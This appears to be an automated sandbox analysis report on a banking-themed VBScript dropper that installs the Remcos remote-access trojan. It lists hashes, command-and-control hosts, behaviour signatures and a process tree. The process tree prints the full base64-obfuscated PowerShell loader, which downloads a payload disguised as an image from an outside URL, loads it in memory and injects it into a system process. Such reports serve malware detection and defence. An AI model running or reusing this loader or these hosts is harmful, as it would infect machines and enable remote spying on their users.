Analysis
-
max time kernel
149s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
17-12-2024 13:29
Static task
static1
Behavioral task
behavioral1
Sample
BBVA S.A..vbs
Resource
win7-20240903-en
General
-
Target
BBVA S.A..vbs
-
Size
167KB
-
MD5
3c217b6a70e1ff5e6ecb71ca0e89644a
-
SHA1
d158bcee429368797c22f4c2f9a305c2ff37beae
-
SHA256
4e66fdbc38893f545b9088331861312e46e612bc9f4f96a9c88b286588680bf9
-
SHA512
38bb4918e229bb83c0f7f4f3ca086253f22197f44887f81dbe4aad019811b91799bc9206155c99906855372cdc0eb09f778913d8d2b59423c3b5e550585672db
-
SSDEEP
1536:groJZFpjN3Z5cpeYTXOnBodK/fI81ltCwKoAVTmT2xc1k3TjSjjXuw7dk+aojwE3:grorj9Z5ccYKKIIyScjXx7dk+aojD
Malware Config
Extracted
https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
https://res.cloudinary.com/dzvai86uh/image/upload/v1734315244/m3gtbqktvnocyvm410aa.jpg
Extracted
remcos
NEW
rem.pushswroller.eu:23101
firewarzone.ydns.eu:23101
sun.drillmmcsnk.eu:23101
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmcghghyrtssxr-7RL1P2
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Blocklisted process makes network request 9 IoCs
flow pid Process 4 2528 WScript.exe 6 2528 WScript.exe 9 2528 WScript.exe 22 3408 powershell.exe 28 3408 powershell.exe 61 3688 wscript.exe 63 2312 powershell.exe 65 2312 powershell.exe 154 4444 wscript.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000\Control Panel\International\Geo\Nation wscript.exe -
pid Process 2312 powershell.exe 4484 powershell.exe 3408 powershell.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3408 set thread context of 3076 3408 powershell.exe 94 PID 2312 set thread context of 4948 2312 powershell.exe 109 -
Drops file in Windows directory 1 IoCs
description ioc Process File opened for modification C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 3 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language aspnet_compiler.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-493223053-2004649691-1575712786-1000_Classes\Local Settings aspnet_compiler.exe -
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid Process 3408 powershell.exe 3408 powershell.exe 2312 powershell.exe 2312 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 3408 powershell.exe Token: SeDebugPrivilege 2312 powershell.exe -
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process 3076 aspnet_compiler.exe 4948 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 2528 wrote to memory of 3408 2528 WScript.exe 83 PID 2528 wrote to memory of 3408 2528 WScript.exe 83 PID 3408 wrote to memory of 4712 3408 powershell.exe 90 PID 3408 wrote to memory of 4712 3408 powershell.exe 90 PID 3408 wrote to memory of 3076 3408 powershell.exe 94 PID 3408 wrote to memory of 3076 3408 powershell.exe 94 PID 3408 wrote to memory of 3076 3408 powershell.exe 94 PID 3408 wrote to memory of 3076 3408 powershell.exe 94 PID 3408 wrote to memory of 3076 3408 powershell.exe 94 PID 3408 wrote to memory of 3076 3408 powershell.exe 94 PID 3408 wrote to memory of 3076 3408 powershell.exe 94 PID 3408 wrote to memory of 3076 3408 powershell.exe 94 PID 3408 wrote to memory of 3076 3408 powershell.exe 94 PID 3408 wrote to memory of 3076 3408 powershell.exe 94 PID 3076 wrote to memory of 3052 3076 aspnet_compiler.exe 103 PID 3076 wrote to memory of 3052 3076 aspnet_compiler.exe 103 PID 3076 wrote to memory of 3052 3076 aspnet_compiler.exe 103 PID 3688 wrote to memory of 2312 3688 wscript.exe 106 PID 3688 wrote to memory of 2312 3688 wscript.exe 106 PID 2312 wrote to memory of 4948 2312 powershell.exe 109 PID 2312 wrote to memory of 4948 2312 powershell.exe 109 PID 2312 wrote to memory of 4948 2312 powershell.exe 109 PID 2312 wrote to memory of 4948 2312 powershell.exe 109 PID 2312 wrote to memory of 4948 2312 powershell.exe 109 PID 2312 wrote to memory of 4948 2312 powershell.exe 109 PID 2312 wrote to memory of 4948 2312 powershell.exe 109 PID 2312 wrote to memory of 4948 2312 powershell.exe 109 PID 2312 wrote to memory of 4948 2312 powershell.exe 109 PID 2312 wrote to memory of 4948 2312 powershell.exe 109 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\BBVA S.A..vbs"1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2528 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3408 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\haematachometer.vbs"3⤵PID:4712
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3076 -
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\sbpcmhoaklamacalaqujnkxrkqqtih.vbs"4⤵
- System Location Discovery: System Language Discovery
PID:3052
-
-
-
-
C:\Windows\system32\wscript.exewscript.exe C:\ProgramData\haematachometer.vbs1⤵
- Blocklisted process makes network request
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3688 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2312 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4948
-
-
-
C:\Windows\system32\wscript.exewscript.exe C:\ProgramData\haematachometer.vbs1⤵
- Blocklisted process makes network request
PID:4444 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $concessionaries = 'aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07aWYgKCRudWxsIC1uZSAkUFNWZXJzaW9uVGFibGUgLWFuZCAkUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIC1uZSAkbnVsbCkgeyBbdm9pZF0kUFNWZXJzaW9uVGFibGUuUFNWZXJzaW9uIH0gZWxzZSB7IFdyaXRlLU91dHB1dCAnUG93ZXJTaGVsbCB2ZXJzaW9uIE5vdCBhdmFpbGFibGUnIH07JHVubWF0ZXJuYWxseSA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9kenZhaTg2dWgvaW1hZ2UvdXBsb2FkL3YxNzM0MzE1MjQ0L20zZ3RicWt0dm5vY3l2bTQxMGFhLmpwZyc7JGJhZG1pbnRvbiA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHJvYWRtYWtlciA9ICRiYWRtaW50b24uRG93bmxvYWREYXRhKCR1bm1hdGVybmFsbHkpOyRQaXNjZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcm9hZG1ha2VyKTskY2FwcmlmaWN1cyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYmlydGhlcnMgPSAnPDxCQVNFNjRfRU5EPj4nOyRkaXNwb3NlZGx5ID0gJFBpc2Nlcy5JbmRleE9mKCRjYXByaWZpY3VzKTskcGljdHVyZSA9ICRQaXNjZXMuSW5kZXhPZigkYmlydGhlcnMpOyRkaXNwb3NlZGx5IC1nZSAwIC1hbmQgJHBpY3R1cmUgLWd0ICRkaXNwb3NlZGx5OyRkaXNwb3NlZGx5ICs9ICRjYXByaWZpY3VzLkxlbmd0aDskYmVlZnN0ZWFrID0gJHBpY3R1cmUgLSAkZGlzcG9zZWRseTskcmV0YXBpbmcgPSAkUGlzY2VzLlN1YnN0cmluZygkZGlzcG9zZWRseSwgJGJlZWZzdGVhayk7JGRpcmVjdGlvbnMgPSAtam9pbiAoJHJldGFwaW5nLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRyZXRhcGluZy5MZW5ndGgpXTskYmVpbGQgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm9tQmFzZTY0U3RyaW5nKCRkaXJlY3Rpb25zKTskbG93ZXJjYXNlZCA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGJlaWxkKTskcm9vbWlseSA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRyb29taWx5Lkludm9rZSgkbnVsbCwgQCgnMC9QWHJVSS9yL2VlLmV0c2FwLy86c3B0dGgnLCAnbXVkd2VlZCcsICdtdWR3ZWVkJywgJ211ZHdlZWQnLCAnYXNwbmV0X2NvbXBpbGVyJywgJ211ZHdlZWQnLCdtdWR3ZWVkJywnbXVkd2VlZCcsJ2hhZW1hdGFjaG9tZXRlcicsICdDOlxQcm9ncmFtRGF0YVwnLCdoYWVtYXRhY2hvbWV0ZXInLCd2YnMnLCcxJywnMScsJ1Rhc2tOYW1lJykpO2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9O2lmICgkbnVsbCAtbmUgJFBTVmVyc2lvblRhYmxlIC1hbmQgJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiAtbmUgJG51bGwpIHsgW3ZvaWRdJFBTVmVyc2lvblRhYmxlLlBTVmVyc2lvbiB9IGVsc2UgeyBXcml0ZS1PdXRwdXQgJ1Bvd2VyU2hlbGwgdmVyc2lvbiBOb3QgYXZhaWxhYmxlJyB9Ow==';$neurologically = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($concessionaries));Invoke-Expression $neurologically2⤵
- Command and Scripting Interpreter: PowerShell
PID:4484
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
167KB
MD53c217b6a70e1ff5e6ecb71ca0e89644a
SHA1d158bcee429368797c22f4c2f9a305c2ff37beae
SHA2564e66fdbc38893f545b9088331861312e46e612bc9f4f96a9c88b286588680bf9
SHA51238bb4918e229bb83c0f7f4f3ca086253f22197f44887f81dbe4aad019811b91799bc9206155c99906855372cdc0eb09f778913d8d2b59423c3b5e550585672db
-
Filesize
734B
MD5e192462f281446b5d1500d474fbacc4b
SHA15ed0044ac937193b78f9878ad7bac5c9ff7534ff
SHA256f1ba9f1b63c447682ebf9de956d0da2a027b1b779abef9522d347d3479139a60
SHA512cc69a761a4e8e1d4bf6585aa8e3e5a7dfed610f540a6d43a288ebb35b16e669874ed5d2b06756ee4f30854f6465c84ee423502fc5b67ee9e7758a2dab41b31d3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD50c7b0d052b925ba0f7c5df8870bd555a
SHA17a2e12ea7d7cb8cb420ea8645dc6400a8b7afa7b
SHA256a72da7ae472fa326fa0b4e9cbc7b180af28a7b1a35d5ab75f28bf11a8bfa2a56
SHA512afcc9f98c87c5340cc73b5a808cd4aa784e51b398bb391253762665901cfd9e65300a875b05e3004452df202728e199a26091b88a17c4e9e761c901c0bc615d3
-
Filesize
3KB
MD5f41839a3fe2888c8b3050197bc9a0a05
SHA10798941aaf7a53a11ea9ed589752890aee069729
SHA256224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a
SHA5122acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699
-
Filesize
77KB
MD5ea91e5a559cf86c5cc019abc9f4bd827
SHA1c4d9d354cde9689da348b6db214b35a1c1a807bf
SHA256a1dc46e1455acf53be3a11104d1930152a3b223aac8a520da0a6a4e370842308
SHA5120603463b0fcdaeede0f600d098d2ba7a99ed1d446f6b9476558575cca5da18a9808f4fe1420831b831d5bc4adc6152d5ad5b697e7c33cecbbec00d27bf2c4a10
-
Filesize
1KB
MD5f9fdf37febe6109ac28a042480859b8a
SHA1f3082730f28d13a47a176e2890b1efa08c00e7a5
SHA25620fb95d2c8f05138b642436e0688f1f8b29239aaa48c8544b8fec1b081fee9be
SHA5123eca582243a99559e92504a6216c1366f517bbc2a66466cdc8411b53343f694488b34e1ab1aa0f3475d29e89fcc1069a61d4d3a8403b699351db9b72e3f291a5
-
Filesize
1KB
MD5e0e053992acb41d6f94825182659c729
SHA1092ba89c8457cf64cad93f6cb5f924d42eafa492
SHA256caa07d4a6cb0256d54fc840e08f400d391787ea2bbb64a507772af48fe043a74
SHA51258a0c29a42d75c1008112407d05f82b6578193fcfcf16f79545d5c08bfb427c0a11b4f59f0372f0e3599770fc59fd23de44bcec77e946d03e99491ac72617376
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
390B
MD565c79ec358abb207d3eb03ca384faf23
SHA1b65865fc07a3e4de0eee833b6c7e3b82db4454a8
SHA256891d444ae2f47b67cd260cedeb13cf9f273f0dfd5479360b91aecf7695d3a3fe
SHA51206f0050bf19d962b8899ffc1b557b47c24d7714337225c4a64844d9f3413f5dae40fc7f6be5a31bdfc9c21037d8b7ac1f9a61927cd073c4d50e81228ab697e58